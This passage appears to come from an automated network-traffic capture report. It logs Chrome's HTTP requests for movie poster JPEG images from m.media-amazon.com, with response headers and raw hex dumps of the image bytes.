                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:14 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 27970
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: dbca3cf2-d811-48ac-996c-cca009f5d595
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Mon, 02 Mar 2020 23:26:35 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Fri, 09 Dec 2044 20:09:26 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 55728
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:14 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200042-IAD, cache-nyc-kteb1890027-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, MISS from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 ad 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 00 06 03 01 00 00 00 00 00 00 00 00 00 00 00 00 03 04 06 07 08 01 02 05 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 01 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 5d a5 87 81 fd 2f 80 e6 e4 cc 6e e5
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"6]/n
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 39 ad 0d 59 b5 b7 f0 24 78 46 d6 b7 7b 9e 2a b6 e9 d8 e5 7a 1f 14 41 b8 0d 59 78 33 03 12 42 84 c8 d9 4c 71 30 d7 33 19 1e 2b ea 39 f3 5b d2 9f 34 13 54 5e 98 c2 9d cc e8 f3 95 2d e5 28 27 24 f4 cc 23 95 5e b5 2a b9 6b 9f 38 92 e3 42 48 f5 61 ab 5e ee 05 bc de 2b ab 91 d4 7a a8 cc 07 e8 df 9a 74 75 3b 8b 38 ab 73 76 fa 16 f6 9c dc 07 c7 65 b2 95 56 cf 37 cd 80 ec 71 5b 39 b5 33 12 2c 71 e9 7c 20 d7 3a dd 98 a4 c7 11 5d bb a7 5a 52 cd c7 c6 47 8a fa 88 f3 53 d2 cf 35 13 54 4a 51 a5 d8 c7 6e 5e 56 c5 65 1c 99 6e 05 ab 4a d5 80 66 a4 6f ba 7c 12 a6 ea 52 3e e1 1e a9 22 63 c8 77 73 f8 35 7e 7f 8c 29 d1 51 11 fa 20 b6 bd 54 2a dc f1 a7 b6 1c c6 86 8d dc c7 70 f2 f6 76 af 5d cc 8b e4 55 7a f9 75 13 4b 1b 5e fd 27 85 40 99 42 6b f0 a8 20 e4 f2 5c c0 07 89 fa 8e
                                                                                                                                                                                          Data Ascii: 9Y$xF{*zAYx3BLq03+9[4T^-('$#^*k8BHa^+ztu;8sveV7q[93,q| :]ZRGS5TJQn^VenJfo|R>"cws5~)Q T*pv]UzuK^'@Bk \
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 80 39 dd 6c e9 b0 83 46 23 f7 11 31 ae 24 bc c9 1a 69 27 00 8d 0c 91 cb 06 56 ef 70 11 72 99 23 50 8e 44 8f 90 8e 55 3f 32 0c 96 e4 b0 02 35 36 45 c0 46 79 93 00 46 32 5e c2 0c 80 1a 29 ff 00 42 d8 0b 68 ab 08 ed 98 75 ac db d9 60 d5 c0 d3 c8 19 f5 00 02 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 2f 10 00 02 01 03 03 02 05 04 02 03 01 01 01 00 00 00 01 02 03 00 04 11 05 12 13 10 21 14 20 22 31 32 06 23 30 41 15 33 40 42 51 24 52 60 ff da 00 08 01 01 00 01 08 02 65 c7 6e 99 ff 00 1b 3e 6c d6 6b 3e 4c d0 91 85 5c da 09 aa 48 cc 47 0d f9 f3 e4 cf 4c f9 33 59 ac f4 cf e0 9a 05 94 61 ae 2d 9a dc f7 fc 38 ff 00 24 0c f5 65 0c 30 6e 2d 42 77 8f 8d ab 89 ab 8d ab 8d ab 8d ab 63 56 d3 5e de fc ab 5e 22 3a f1 31
                                                                                                                                                                                          Data Ascii: 9lF#1$i'Vpr#PDU?256EFyF2^)Bhu`/! "12#0A3@BQ$R`en>lk>L\HGL3Ya-8$e0n-BwcV^^":1
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 57 06 d6 5d f1 a9 3e f4 ce 10 65 af b5 61 02 a9 0e e5 89 27 4e f8 bd 24 58 2c c7 c3 9c 60 98 7b e4 08 31 4d 01 a1 1f a8 1a 96 1e 4c d3 40 58 36 5a 2f fe 42 e3 cd 73 fd d2 d0 a6 6d c7 a2 d2 d6 ea 26 97 03 bd 24 ce 87 b6 d0 d5 63 61 6b 77 85 a9 7e 9c db fd 77 16 ef 01 db 24 32 67 b1 97 e2 73 a4 14 79 30 e3 6e 3b 78 c5 3d a2 be d6 0e 40 52 79 32 dd 34 c8 0c 91 c8 56 52 72 80 34 bb 33 46 6e f8 a1 3f 6c d2 cd 93 8a 8d b7 d7 88 a6 97 01 a8 3e e3 4b 9f df 96 eb fb a6 a9 4f eb c9 bc d2 ad 33 62 8b 1a 0d ff 00 42 ff 00 c8 63 77 65 58 e1 63 b5 44 8f 1e ee c6 e7 46 2b 96 b6 ba 72 9e 93 1c c1 2b f9 a5 a6 3b bb b6 f2 2a 27 06 9a be 9c f8 4d 57 36 42 4f 52 b2 e0 f7 c7 4c 0e b8 ac 79 ee 7f be 6a 94 fa 8f 51 40 e2 83 51 ef d5 18 8a 8e 76 81 c4 89 6d 70 b7 b1 07 55 bd e3
                                                                                                                                                                                          Data Ascii: W]>ea'N$X,`{1ML@X6Z/Bsm&$cakw~w$2gsy0n;x=@Ry24VRr43Fn?l>KO3bBcweXcDF+r+;*'MW6BORLyjQ@QvmpU
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: f5 58 af 87 a5 7a 6b 77 2d 39 31 2d ad a0 63 90 22 58 be 11 20 cb 6f 32 49 01 dd 5a 66 a0 2e 54 67 a4 ae 23 52 c6 f2 f9 e7 6e de 1d e8 c2 e3 a6 87 11 ce ef cd a9 dc 5f 46 7f f3 ae 83 77 32 bc 87 4a b7 36 d6 f1 46 dd 6e 34 88 27 24 d4 d1 b2 3b ab 68 13 45 1c e3 91 7a 5e ce 77 4a a2 c8 ee f4 d1 b6 25 bb 39 31 32 86 81 d6 6f 9c 72 0b 69 42 ac 2f bc 67 a6 a4 e5 c8 8d 6d f4 80 07 dc fe 36 dc 53 e8 f0 9f 6b ad 3d a3 60 1a c6 2e 38 96 9e 74 8f e5 1d d2 4b d9 68 df 44 b5 0d f2 4a db 55 f5 08 a3 a8 ae 91 d4 b5 36 ab 12 d2 5e 46 e0 b5 3e ad 12 1a 8f 50 89 eb c5 c7 82 d4 da bc 4b 56 fa 82 4e 70 1e 74 8f e5 1c e8 ff 00 1a 96 65 88 65 a5 d6 f0 7d 30 6b 21 ce 1b 51 05 a3 2b 6d a6 e8 d1 da a2 6f 5e 8e 73 9a d3 e7 11 bf 77 b7 92 53 d9 ac 2e 17 de db 4c 67 ee 56 d7 6c 9b
                                                                                                                                                                                          Data Ascii: Xzkw-91-c"X o2IZf.Tg#Rn_Fw2J6Fn4'$;hEz^wJ%912oriB/gm6Sk=`.8tKhDJU6^F>PKVNptee}0k!Q+mo^swS.LgVl
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 1a 69 23 29 4b a4 4f b3 14 9a 34 ea c0 d7 f1 52 d7 f1 52 d6 99 a6 bd b4 85 9b ff 00 c2 ff 00 ff c4 00 2c 11 00 02 02 02 01 03 03 03 05 00 03 01 00 00 00 00 01 02 00 03 04 11 12 05 10 21 13 14 31 20 22 32 06 15 23 34 41 30 42 51 61 ff da 00 08 01 02 01 01 08 00 c4 eb 15 65 0d 1e 10 7f e4 f1 d8 7d 5e 26 a0 3d f5 38 18 d4 82 3e e0 c5 5b 92 e1 7e a1 57 02 bc 8f 7d 41 9e ff 00 1e 7b dc 79 ef 68 9e fa 89 ef a8 9e f6 89 ef 68 9e f6 99 ef a8 83 26 a7 3c 50 09 c6 71 9f fc 9a 96 df c0 6e 19 60 f8 82 05 9a 8d 61 1b 03 9f 80 60 3b fa 35 3a 37 f7 60 fa 37 0d 61 87 99 68 f0 20 82 31 89 53 1d b7 6f 4c 42 38 91 f4 74 6f ee 08 f8 db b5 f8 63 01 5d 9e a3 ad f5 b9 2a 9d b9 8e d6 7f 90 08 21 1b 9f 02 0d c7 c9 54 dc a2 cb 2f b9 ae 7e fd 1f fb a2 3e 3d 3e a9 b8 8a a9 60 10 55
                                                                                                                                                                                          Data Ascii: i#)KO4RR,!1 "2#4A0BQae}^&=8>[~W}A{yhh&<Pqn`a`;5:7`7ah 1SoLB8toc]*!T/~>=>`U
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 1f 3d bd db f9 83 3e c1 a8 3a a5 b1 ec 36 37 23 ff 00 3f ff c4 00 2e 11 00 02 02 01 03 03 03 03 03 05 01 01 00 00 00 00 01 02 03 04 00 05 11 12 06 10 21 13 14 31 15 22 35 20 32 41 07 16 23 30 42 25 71 ff da 00 08 01 03 01 01 08 00 d4 7a 6a 7a 0d b8 e7 e3 63 dc e1 5c d8 e6 ed 9e 73 73 9b 9c db 38 e7 1c e3 db 90 c5 9d 94 fd ad 1a ba 94 7d 4f a3 1e 22 66 a6 74 9b 83 3e 8f 73 3e 93 73 0e 93 73 3e 95 77 3e 93 73 3e 93 73 3e 93 73 3e 93 73 3e 93 73 24 a1 66 25 e5 28 63 9c b0 36 6d 9c 72 1a de a3 6d da bf fd 61 18 4e 12 72 3a e5 f6 27 d0 23 70 48 db b6 d9 b7 6e ab fc 56 0c db b0 c0 30 48 54 ee b9 5f fe b0 e6 d9 0d 45 3f 33 4c 8b b4 63 cf c8 e4 30 f1 23 75 ed b6 75 57 e2 8e 43 7c 08 23 12 db 26 68 7d 18 9a ac a8 aa ce 33 7c e0 7b 40 7f 76 13 8b 16 c3 7c 59 38 f9
                                                                                                                                                                                          Data Ascii: =>:67#?.!1"5 2A#0B%qzjzc\ss8}O"ft>s>ss>w>s>s>s>s>s$f%(c6mrmaNr:'#pHnV0HT_E?3Lc0#uuWC|#&h}3|{@v|Y8
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: e5 98 6b 7a 14 d7 68 d4 7a ba 85 85 ad d3 81 63 ad 11 a7 d3 45 a0 a3 a5 43 6b 41 34 d3 40 b3 26 99 72 c4 56 ef 6a 02 dd d9 ac e3 1d ce 55 84 42 16 cb c8 88 1c 38 d5 2e 84 8c 46 99 a5 75 a5 9d 33 fc 78 3f aa 74 b8 ee 5b a8 ab 6b 16 d4 ea 56 fa 22 93 d7 69 68 3f 54 ad 5d 3b e9 94 a1 d5 ec d7 89 e1 81 6c 48 92 09 56 df 58 ea 17 60 15 e6 fe ea be 69 7b 13 36 ab 6a c2 aa 4d 1e bf 76 28 0d 64 a9 ae db a2 49 ad 6b 5a b5 75 f9 d9 df b5 6b 6b 34 5c 50 c4 bf b2 3b ab 20 b0 de af e8 f5 5c 2f 0f d0 3c 67 23 9c ce 6e 7f 4d 52 12 a4 58 2d 80 e4 2e a8 91 7b 73 3b c6 fc 90 37 67 d5 e3 49 5a 22 2f a9 28 03 6a c1 49 05 75 94 74 2e b1 58 f5 01 3f ea 37 e5 03 ec f7 93 6f ea 19 35 59 2d 03 ca 9d 80 41 8f b3 69 d1 3b 99 19 74 f8 c1 18 d4 63 6f 91 a7 c4 a3 61 1d 75 8f 7e 3b 66
                                                                                                                                                                                          Data Ascii: kzhzcECkA4@&rVjUB8.Fu3x?t[kV"ih?T];lHVX`i{6jMv(dIkZukk4\P; \/<g#nMRX-.{s;7gIZ"/(jIut.X?7o5Y-Ai;tcoau~;f
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 0c 43 96 08 1a fe 13 23 61 50 6b a7 22 fc 26 75 af fc fb 7e 35 1a 1c 22 b3 44 19 d4 31 a4 73 b6 c9 08 e0 b8 ed 52 36 1f f1 f5 1e d6 c1 a1 c6 d1 8a 61 7d 85 18 a6 9f e8 8b 91 92 33 46 48 c2 f4 51 8d c8 c0 23 61 72 04 9a 5c 6d 0f 8c d5 29 6d 42 68 33 84 d6 b7 04 fc 11 7e 89 d9 1c 17 41 54 64 7c 44 05 2e cc 0d e5 7f 72 93 65 e0 a0 fc 06 79 aa a0 fc 10 78 c1 07 1e d0 88 26 5d 83 24 33 8b 85 d0 55 86 f5 01 d9 6f 7a 0f c1 64 0f 55 33 eb 05 0f e2 73 ef 59 ff 00 ea 9e de 96 8c 13 60 6a 8a 6d a2 bb 51 b4 39 33 0b c7 78 23 9d 85 ef 6d 02 80 e2 b9 b9 44 5e 50 3b 14 c6 69 be ae c8 c8 47 d9 54 45 18 91 b9 78 79 a2 3b c5 17 a7 77 97 86 88 ea 14 da 8c 5e f0 53 86 09 92 93 5c 0a 21 ed 14 64 5f 1a a9 35 30 bb d8 5e 1a 20 e0 29 89 e5 5e 14 5e 1a b2 ee 51 b1 9f 41 bd 76 9d
                                                                                                                                                                                          Data Ascii: C#aPk"&u~5"D1sR6a}3FHQ#ar\m)mBh3~ATd|D.reyx&]$3UozdU3sY`jmQ93x#mD^P;iGTExy;w^S\!d_50^ )^^QAv
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: d8 6d f6 8a b2 3e 0f 28 6b c1 c7 ea af 0a f0 66 3e 07 1c 7c 0f 81 fa 53 2f 80 56 28 04 51 40 38 29 df 63 94 c9 26 69 f7 df 88 11 70 51 40 22 e1 51 45 14 5c 14 51 45 14 50 70 22 b1 45 14 50 0f 4a 9c 4e 82 c1 b8 30 e2 26 c2 31 04 83 fa 07 0d b8 9b 89 bc 9b e8 48 d0 84 77 19 fd a9 fd 69 fd 69 fd c8 3f d8 9f d0 9f d6 84 37 ef 4f eb 4f e8 4f ee 4f e8 40 6d 63 51 c0 fa 8f 07 09 82 ea 1e 36 9e 50 62 15 e0 20 52 34 21 42 19 82 25 d0 a9 98 e0 9c 11 ed 53 35 2e 34 bc 00 38 af 05 20 0e 33 81 f7 9f 1c 0f 17 eb 08 87 13 63 16 66 60 40 e0 2b c0 23 24 04 e7 8e 42 e4 ed de 2c 34 77 39 bc f3 c9 57 b4 bf 57 6c 4f 50 83 5a 62 0a 89 4e ab 68 f6 19 da 14 68 02 12 17 9b 22 96 96 f4 32 53 f7 72 e0 7d 46 3e 0b d3 54 aa 03 c6 08 a9 36 1a f4 be 4c a1 0c 75 3f cf c4 ab 82 77 3f 80
                                                                                                                                                                                          Data Ascii: m>(kf>|S/V(Q@8)c&ipQ@"QE\QEPp"EPJN0&1Hwii?7OOOO@mcQ6Pb R4!B%S5.48 3cf`@+#$B,4w9WWlOPZbNhh"2Sr}F>T6Lu?w?


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          116192.168.2.1649856151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:14 UTC644OUTGET /images/M/MV5BMTc2MTY4NTM2NV5BMl5BanBnXkFtZTcwNzEyMzkxMQ@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:14 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 14097
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: aeb8b9ae-7e6e-488e-9658-2e2f23003bdd
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Thu, 13 Mar 2008 23:21:13 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Wed, 12 Oct 2044 15:33:44 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 876076
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:14 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200074-IAD, cache-nyc-kteb1890090-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 ab 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 06 01 04 05 07 08 02 03 09 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ec 60 00 00 00 00 00 00 00 00 00 0a 94 56
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"4`V
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 24 02 73 03 9d a7 a0 01 e8 00 00 02 ce f6 c2 35 fe ce d6 1b 3f 37 13 15 95 eb 6d 4f cf 6c 47 cd 5e 5e bc a2 be 7d 15 28 74 04 0a 79 14 9b fd 2f d2 1b c3 9c 53 44 ea 2c 85 f9 bc 36 2f 46 ac 86 cd 02 05 36 85 cd 0f 74 ad 00 3d 00 00 00 58 df 58 46 bb da 9a a3 6b 65 89 d7 7b 13 5d e9 f9 af eb 37 2c bd e0 77 d3 ff 00 59 f4 c0 b3 79 1c 3e bc f1 cb 7b dc 75 e1 bf a5 11 de eb cd bd e6 9e 94 e7 64 e3 bf a6 d5 d5 e7 ea 55 4b 00 87 ca a3 92 40 00 3d 00 00 00 59 5e d9 46 b9 da 9a bb 68 c6 22 17 34 88 dd 71 0f bf b7 cb 3f 77 e3 f2 f3 6f 39 59 e3 7e b8 8b e0 f3 61 69 e3 7e 5e 86 ee 9e 0f ee b9 72 71 c9 0d d2 6b 1d 8f f7 20 50 10 e9 6c 2e 66 00 07 a0 2b 8e 81 cd 6c da c2 e6 16 7a 56 88 b2 bd b1 88 06 ce d6 3b 32 5c 6c 42 5b 1b b7 88 2c bd 62 38 fd 5f 7f 19 dc b2 70 d7
                                                                                                                                                                                          Data Ascii: $s5?7mOlG^^}(ty/SD,6/F6t=XXFke{]7,wYy>{udUK@=Y^Fh"4q?wo9Y~ai~^rqk Pl.f+lzV;2\lB[,b8_p
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: f2 36 37 8c e4 37 d4 1c 63 9e 4c 1f aa 13 44 d3 2c 4e bc b3 06 f4 80 97 01 33 06 a5 56 03 b3 a9 c5 99 c4 88 5e 28 64 b0 c6 e1 0d 53 b7 9e 8d c1 3c 52 4a ad d4 2a fa 75 60 f2 9e ed c4 78 ad d6 7b d2 9e 50 67 32 3b 0f 9b 8c 65 68 87 36 73 b6 70 3b 34 83 34 ac 60 07 b6 f7 61 e9 3a b7 27 d1 70 d3 c7 28 6e a2 92 cc 61 c4 6a 51 44 2f 1b 8a ba fb b8 0f 27 1f dd d5 05 11 e4 16 e4 51 83 6e ab 8b e2 1f 4c 15 01 54 0d 72 c4 28 4f 39 af c8 aa 40 c7 50 99 e1 7d 2c a3 95 e1 86 ae 4d 26 56 24 11 a9 0b cd 55 c1 b1 39 b7 b3 16 54 2b ef 6a 48 2a 50 ce 68 22 66 7d 5c 79 ab 1f 55 71 64 7f 55 b6 64 16 be cc f2 bd 66 7d 71 33 b6 db dd 87 dd fe 7b 1d 6e 0a cc 32 88 bf d5 64 05 80 5e 09 1f 55 56 cf 85 65 8a 3e 51 29 23 78 a6 96 c1 47 5c e4 af 34 41 65 f4 84 b9 62 cd f7 00 16 1b
                                                                                                                                                                                          Data Ascii: 677cLD,N3V^(dS<RJ*u`x{Pg2;eh6sp;44`a:'p(najQD/'QnLTr(O9@P},M&V$U9T+jH*Ph"f}\yUqdUdf}q3{n2d^UVe>Q)#xG\4Aeb
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: e5 12 bf 10 26 87 53 b0 b5 59 ec 51 fa 24 6c 4c e4 e4 14 e0 28 db 33 58 8f 60 4d d6 75 07 9d 17 67 50 f6 5e a0 fc 49 3a 3e 9f f9 ce 8c bc 6c 99 7a 84 b4 ee 95 99 75 2a fe 58 fd b8 87 60 4d d6 25 5f f2 11 76 75 0f 65 8f fe 24 9b 5a 37 74 d0 3a 18 f2 76 d5 2c 4d 93 90 ec f4 fb 67 24 cc d2 e1 36 48 d8 93 2f 52 0e 6d 12 9e 2d 2e ab 72 90 3d b7 9b e3 d7 25 5f f2 11 76 75 0f 65 8f 7e 24 88 21 d4 86 26 65 96 5b 09 bf 95 26 6e 88 96 6b d3 6f f7 cb 60 af 51 3e 43 12 9f 49 06 6a bb 11 98 64 de cb bf d7 ae 4a bf e4 22 ec ea 1e cb 17 6c eb c8 b2 f6 39 ff 00 8e 0e fd f2 66 4e ec bd 39 f9 0e 9d 0f 65 72 90 5b 1d 27 0e 0f 5a 24 d1 88 fc 7d 97 5f e3 d7 25 5f ce 8b b3 a8 7b 2c 55 f2 af 26 dc d3 8f fa 52 b3 7c 4b 5b ed f4 e7 e4 3a 74 1d 9b a1 7b b0 75 c9 57 f3 a2 ec a1 ec
                                                                                                                                                                                          Data Ascii: &SYQ$lL(3X`MugP^I:>lzu*X`M%_vue$Z7t:v,Mg$6H/Rm-.r=%_vue~$!&e[&nko`Q>CIjdJ"l9fN9er['Z$}_%_{,U&R|K[:t{uW
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 41 20 32 13 22 05 40 42 50 ff da 00 08 01 03 01 01 08 00 fe b5 cb 9b a5 cd c2 5c b9 7a df 0d 4d b3 64 d9 36 cd a2 6d 13 68 9b 66 d9 f8 e6 ca e2 27 e1 7c a3 4b d2 b9 c7 01 80 69 50 9d 07 bf 95 e9 72 e5 e8 74 bd 2f 9c ca e7 02 6c ad 2e 5f 31 88 3f 61 19 63 25 42 34 1c a6 27 d8 42 26 20 fd 60 42 4c 6c 02 a2 e2 fc 7d f0 83 51 1a e6 d6 61 13 04 28 99 82 6e a0 e5 30 0b 30 1d 8d 51 47 81 5b 45 4c 6c 3b 33 6d 72 98 b6 48 a7 52 3b 5c db af 88 31 b7 95 8c 96 2e 3a d1 3c a6 21 a6 06 62 b8 24 12 e4 33 7e a8 81 14 13 8b 9d f4 37 58 9e e6 d3 c6 60 f0 44 34 d1 4a a9 b8 73 0c d3 f1 92 61 5a 83 b8 5c 4d 90 89 ef 80 e8 41 bf 21 ab a3 88 4c 0c 44 06 c5 91 dc e8 e8 78 4e 97 7f 0f f3 01 84 d9 97 a7 be 2c 3c 8b e2 41 fc 48 af 2f 97 d9 62 18 be 44 a8 57 91 2b 7a d8 00 2f 87 c6
                                                                                                                                                                                          Data Ascii: A 2"@BP\zMd6mhf'|KiPrt/l._1?ac%B4'B& `BLl}Qa(n00QG[ELl;3mrHR;\1.:<!b$3~7X`D4JsaZ\MA!LDxN,<AH/bDW+z/
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: c8 6a 1e 05 a3 ce ba a9 a8 c8 14 cd be 38 05 a2 80 a8 d7 5d c2 9a ea 35 84 ef 82 1a 8e af 21 5e 61 d7 5e 4a bc f5 e0 75 57 70 a1 d7 50 a6 50 52 0a 68 e1 92 93 68 8a 79 58 8d 19 46 9a ea b3 26 cd 77 0a 1b 1d ec 82 36 ff 00 0c ae 16 32 36 6b b8 50 d8 37 1f 84 57 9a c6 69 85 30 93 e8 bb c7 55 77 0a 1d 7c 2e 7f 0c af 35 8f 33 6c d7 70 a1 bc fc 32 9b 4c ec 79 86 eb 43 73 ed af cb ae ba 84 7b 43 75 a1 bc f2 9b 0d 8f a9 8a 10 dd 68 6f 3c a6 ea bb 85 0d e7 94 dd 56 e0 c0 26 39 dc 60 a4 68 64 6d 50 d9 c2 df 94 dd 56 e3 ba 09 d9 1e 99 a8 cb 82 cb 3c 21 e8 bb cc 30 36 68 75 d2 e6 86 ea b7 19 45 18 08 ac 06 05 55 b6 68 75 d2 e6 86 ea b7 02 2c 38 f0 5b 33 f4 42 2e e1 80 f5 53 39 9a 9b 34 3a e9 63 15 88 d7 82 71 31 8d d5 6e 58 0f c1 08 7a 4a d5 0e ba 5c 9a da 74 cd e3
                                                                                                                                                                                          Data Ascii: j8]5!^a^JuWpPPRhhyXF&w626kP7Wi0Uw|.53lp2LyCs{Cuho<V&9`hdmPV<!06huEUhu,8[3B.S94:cq1nXzJ\t
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: f3 92 4c ff 00 25 0f c4 fc cc 64 26 05 14 75 2b 3a df e4 ce 2a bd d4 b5 ea 05 af d1 e5 9d 76 c4 7b 2d c9 c5 4c 53 79 14 16 08 e9 b5 c4 53 e4 45 48 d6 35 6a bf 44 8e 34 ab d5 0f a7 02 85 b7 d8 5f e4 64 6d c3 fe 73 25 74 b4 b6 f7 7f f3 a5 8a cb a5 fb 74 e8 76 51 9b 8a 2a 7f a2 2a 81 7d 8f f3 2c 0c 26 4f 5b 70 7c 41 df 36 17 1b 39 bc 90 fd ae 55 96 5f da 91 89 74 ce 28 93 15 02 6b 9b ae 45 94 44 82 4d 7c a0 a4 59 f0 93 99 94 8b 6a b3 bf 3f f4 63 f6 58 3a 72 f4 4f 43 85 b2 3c c3 58 08 72 19 41 3d 9e 4c 39 da 0e 75 24 5a 5d 66 d9 fb 34 0a 37 14 fa c3 75 7e 87 fa 1f da f1 fb 3a 52 c5 d2 fd ba 18 ea ca cc 93 85 c8 a2 52 6c a8 33 64 72 d3 52 dc d1 88 02 af 3b fc 09 a2 53 26 f5 86 86 87 02 71 91 7b 8e 46 1b 9c 88 bf a8 ee d8 84 49 8b 72 d9 b3 cd a4 7f 02 9c 14 9a
                                                                                                                                                                                          Data Ascii: L%d&u+:*v{-LSySEH5jD4_dms%ttvQ**},&O[p|A69U_t(kEDM|Yj?cX:rOC<XrA=L9u$Z]f47u~:RRl3drR;S&q{FIr
